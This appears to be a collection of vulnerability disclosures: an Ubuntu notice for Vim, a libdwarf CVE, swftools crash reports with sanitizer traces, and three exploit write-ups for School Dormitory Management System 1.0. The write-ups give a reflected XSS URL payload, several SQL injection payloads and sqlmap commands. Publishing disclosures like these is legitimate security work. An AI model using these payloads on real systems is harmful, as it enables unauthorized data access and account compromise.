Ubuntu Security Notice 5458-1 - It was discovered that Vim was incorrectly handling virtual column position operations, which could result in an out-of-bounds read. An attacker could possibly use this issue to expose sensitive information. It was discovered that Vim was not properly performing bounds checks when updating windows present on a screen, which could result in a heap buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5458-1June 02, 2022vim vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim was incorrectly handling virtual columnposition operations, which could result in an out-of-bounds read. Anattacker could possibly use this issue to expose sensitiveinformation. (CVE-2021-4193)It was discovered that Vim was not properly performing bounds checkswhen updating windows present on a screen, which could result in aheap buffer overflow. An attacker could possibly use this issue tocause a denial of service or execute arbitrary code. (CVE-2022-0213)It was discovered that Vim was incorrectly handling windowexchanging operations when in Visual mode, which could result in anout-of-bounds read. An attacker could possibly use this issue toexpose sensitive information. (CVE-2022-0319)It was discovered that Vim was incorrectly handling recursion whenparsing conditional expressions. An attacker could possibly use thisissue to cause a denial of service or execute arbitrary code.(CVE-2022-0351)It was discovered that Vim was not properly handling memoryallocation when processing data in Ex mode, which could result in aheap buffer overflow. An attacker could possibly use this issue tocause a denial of service or execute arbitrary code.(CVE-2022-0359)It was discovered that Vim was not properly performing bounds checkswhen executing line operations in Visual mode, which could result ina heap buffer overflow. An attacker could possibly use this issue tocause a denial of service or execute arbitrary code.(CVE-2022-0361, CVE-2022-0368)It was discovered that Vim was not properly handling loop conditionswhen looking for spell suggestions, which could result in a stackbuffer overflow. An attacker could possibly use this issue to causea denial of service or execute arbitrary code. (CVE-2022-0408)It was discovered that Vim was incorrectly handling memory accesswhen executing buffer operations, which could result in the usage offreed memory. An attacker could possibly use this issue to executearbitrary code. (CVE-2022-0443)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   vim                             2:7.4.1689-3ubuntu1.5+esm5In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5458-1   CVE-2021-4193, CVE-2022-0213, CVE-2022-0319, CVE-2022-0351,   CVE-2022-0359, CVE-2022-0361, CVE-2022-0368, CVE-2022-0408,   CVE-2022-0443

Ubuntu Security Notice USN-5458-1

libdwarf 0.4.0 has a heap-based buffer over-read in _dwarf_check_string_valid in dwarf_util.c.

CVE-2022-32200: DA's Libdwarf Vulnerabilities

School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:126.

**CVE-2022-30514**

School Dormitory Management System 1.0 - Reflected XSS

**Exploit Title: School Dormitory Management System 1.0 - Reflected XSS****Date: 2022-05-25****CVE: CVE-2022-30514****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html****Version: 1.0****Tested on: LAMP, Ubuntu**

**\[#\] Vulnerability Location:**

$_GET['s'] in /dms/admin/inc/navigation.php:126

**\[#\] Exploitation :**

http://localhost/dms/admin/?s=%27;%20alert(%22b4zb0z%22);%20s=%27

CVE-2022-30514: GitHub - bigzooooz/CVE-2022-30514: School Dormitory Management System 1.0 - Reflected XSS

School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/view_details.php:4.

**CVE-2022-30511**

School Dormitory Management System 1.0 - Unauthenticated SQL Injection

**Exploit Title: School Dormitory Management System 1.0 - Unauthenticated SQL Injection****Date: 2022-05-25****CVE: CVE-2022-30511****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html****Version: 1.0****Tested on: LAMP, Ubuntu**

\[#\] Vulnerability Location: $_GET['id'] in /dms/admin/accounts/view_details.php:4

> Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=accounts/view\_details&id=2' AND 8853=8853 AND 'kujz'='kujz

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=accounts/view_details&id=2' AND (SELECT 8739 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8739=8739,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'fkLf'='fkLf
    

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=accounts/view_details&id=2' AND (SELECT 7339 FROM (SELECT(SLEEP(5)))Dkxx) AND 'UZCm'='UZCm
    

\[#\] Exploitation Using SQLMAP: sqlmap -u "http://localhost/dms/admin/?page=accounts/view_details&id=2" --dbms=mysql

CVE-2022-30511: GitHub - bigzooooz/CVE-2022-30511: School Dormitory Management System 1.0 - Unauthenticated SQL Injection

School Dormitory Management System 1.0 is vulnerable to SQL Injection via reports/daily_collection_report.php:59.

**CVE-2022-30510**

School Dormitory Management System 1.0 - Unauthenticated SQL Injection

**Exploit Title: School Dormitory Management System 1.0 - Unauthenticated SQL Injection****Date: 2022-05-25****CVE: CVE-2022-30510****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html****Version: 1.0****Tested on: LAMP, Ubuntu**

\[#\] Vulnerability Location: $_GET['month'] in /dms/admin/reports/daily_collection_report.php:59

> Parameter: month (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page=reports/daily\_collection\_report&month=2022-05' RLIKE (SELECT (CASE WHEN (2158=2158) THEN 0x323032322d3035 ELSE 0x28 END))-- UWOA

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=reports/daily_collection_report&month=2022-05' AND (SELECT 1645 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(1645=1645,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UlyZ
    

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=reports/daily_collection_report&month=2022-05' AND (SELECT 3409 FROM (SELECT(SLEEP(5)))uaoG)-- rTvo
    

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: page=reports/daily_collection_report&month=2022-05' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x46716d4777627770436a6b56566f764c4d6f5a6b476b615041477742414f6979424e4f51744a5563,0x71766b7a71),NULL,NULL#
    

\[#\] Exploitation Using SQLMAP: sqlmap -u "http://localhost/dms/admin/?page=reports/daily_collection_report&month=2022-05" --dbms=mysql

CVE-2022-30510: GitHub - bigzooooz/CVE-2022-30510: School Dormitory Management System 1.0 - Unauthenticated SQL Injection

An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function traits_parse() located in abc.c. It allows an attacker to cause Denial of Service.

**system info**

Ubuntu x86\_64, clang 6.0, swfdump (latest master a9d5082)

**Command line**

./src/swfdump -D @@

**AddressSanitizer output**

\==47344==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x000000488d17 bp 0x000000000000 sp 0x7fffffffdd20 T0)  
#0 0x488d16 in traits\_parse as3/abc.c:482  
#1 0x495d41 in swf\_ReadABC as3/abc.c:946  
#2 0x409045 in main /test/swftools-asan/src/swfdump.c:1577  
#3 0x7ffff68a683f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#4 0x40c168 in \_start (/test/swftools-asan/src/swfdump+0x40c168)

AddressSanitizer can not provide additional info.  
SUMMARY: AddressSanitizer: SEGV as3/abc.c:482 traits\_parse  
\==47344==ABORTING

POC  
traits\_parse\_poc

CVE-2021-42196: A NULL pointer dereference exists in the function traits_parse  in abc.c · Issue #172 · matthiaskramm/swftools

An issue was discovered in swftools through 20201222 through a memory leak in the swftools when swfdump is used. It allows an attacker to cause code execution.

**system info**

Ubuntu x86\_64, clang 6.0, swfdump (latest master a9d5082)

**Command line**

./src/swfdump -D @@

**AddressSanitizer output**

\==43305==ERROR: LeakSanitizer: detected memory leaks

Indirect leak of 63245 byte(s) in 2 object(s) allocated from:  
#0 0x7ffff6f02602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)  
#1 0x532fa7 in rfx\_alloc /test/swftools-asan/lib/mem.c:30  
#2 0x7fffffffe2bf ()

Indirect leak of 144 byte(s) in 3 object(s) allocated from:  
#0 0x7ffff6f0279a in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x9879a)  
#1 0x53318c in rfx\_calloc /test/swftools-asan/lib/mem.c:69  
#2 0x7fffffffe2bf ()

SUMMARY: AddressSanitizer: 63389 byte(s) leaked in 5 allocation(s).

POC  
memory\_leaks\_poc

CVE-2021-42197: memory leaks in swftools when we use swfdump · Issue #177 · matthiaskramm/swftools

An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function swf_GetBits() located in rfxswf.c. It allows an attacker to cause Denial of Service.

**system info**

Ubuntu x86\_64, clang 6.0, swfdump (latest master a9d5082)

**Command line**

./src/swfdump -D @@

**AddressSanitizer output**

\==41593==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000471fac bp 0x0ffffed896e0 sp 0x7fffffffdd30 T0)  
#0 0x471fab in swf\_GetBits /test/swftools-asan/lib/rfxswf.c:213  
#1 0x478bf8 in swf\_GetMatrix /test/swftools-asan/lib/rfxswf.c:867  
#2 0x414975 in handlePlaceObject /test/swftools-asan/src/swfdump.c:831  
#3 0x409acd in main /test/swftools-asan/src/swfdump.c:1604  
#4 0x7ffff68a683f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#5 0x40c168 in \_start (/test/swftools-asan/src/swfdump+0x40c168)

AddressSanitizer can not provide additional info.  
SUMMARY: AddressSanitizer: SEGV /test/swftools-asan/lib/rfxswf.c:213 swf\_GetBits  
\==41593==ABORTING

POC  
swf\_GetBits\_null\_poc

CVE-2021-42198: A NULL pointer dereference exists in the function swf_GetBits in rfxswf.c · Issue #168 · matthiaskramm/swftools

An issue was discovered in swftools through 20201222. A heap buffer overflow exists in the function swf_FontExtract_DefineTextCallback() located in swftext.c. It allows an attacker to cause code execution.

**system info**

Ubuntu x86\_64, clang 6.0, swfdump (latest master a9d5082)

**Command line**

./src/swfdump -D @@

**AddressSanitizer output**

\==29246==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000ffa0 at pc 0x00000044059d bp 0x7fffffffd270 sp 0x7fffffffd260  
WRITE of size 2 at 0x61600000ffa0 thread T0  
#0 0x44059c in swf\_FontExtract\_DefineTextCallback modules/swftext.c:508  
#1 0x449c46 in swf\_FontExtract\_DefineText modules/swftext.c:532  
#2 0x44a355 in swf\_FontExtract modules/swftext.c:617  
#3 0x40c2dc in fontcallback2 /test/swftools-asan/src/swfdump.c:941  
#4 0x4433c6 in swf\_FontEnumerate modules/swftext.c:133  
#5 0x409208 in main /test/swftools-asan/src/swfdump.c:1296  
#6 0x7ffff68a683f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#7 0x40c168 in \_start (/test/swftools-asan/src/swfdump+0x40c168)

AddressSanitizer can not describe address in more detail (wild memory access suspected).  
SUMMARY: AddressSanitizer: heap-buffer-overflow modules/swftext.c:508 swf\_FontExtract\_DefineTextCallback  
Shadow bytes around the buggy address:  
0x0c2c7fff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c2c7fff9fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c2c7fff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c2c7fff9fd0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa  
0x0c2c7fff9fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
\=>0x0c2c7fff9ff0: fa fa fa fa\[fa\]fa fa fa fa fa fa fa fa fa fa fa  
0x0c2c7fffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c2c7fffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c2c7fffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c2c7fffa030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c2c7fffa040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Heap right redzone: fb  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack partial redzone: f4  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
\==29246==ABORTING  
POC  
swf\_FontExtract\_DefineTextCallback\_poc

CVE-2021-42199: heap-buffer-overflow exists in the function swf_FontExtract_DefineTextCallback  in swftext.c · Issue #173 · matthiaskramm/swftools

An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function main() located in swfdump.c. It allows an attacker to cause Denial of Service.

**system info**

Ubuntu x86\_64, clang 6.0, swfdump (latest master a9d5082)

**Command line**

./src/swfdump -D @@

**AddressSanitizer output**

\==1975==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000406f68 bp 0x7fffffffe3a0 sp 0x7fffffffdf30 T0)  
#0 0x406f67 in main /test/swftools-asan/src/swfdump.c:1323  
#1 0x7ffff68a683f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#2 0x40c168 in \_start (/test/swftools-asan/src/swfdump+0x40c168)

AddressSanitizer can not provide additional info.  
SUMMARY: AddressSanitizer: SEGV /test/swftools-asan/src/swfdump.c:1323 main  
\==1975==ABORTING  
POC  
main\_poc

Tag

#ubuntu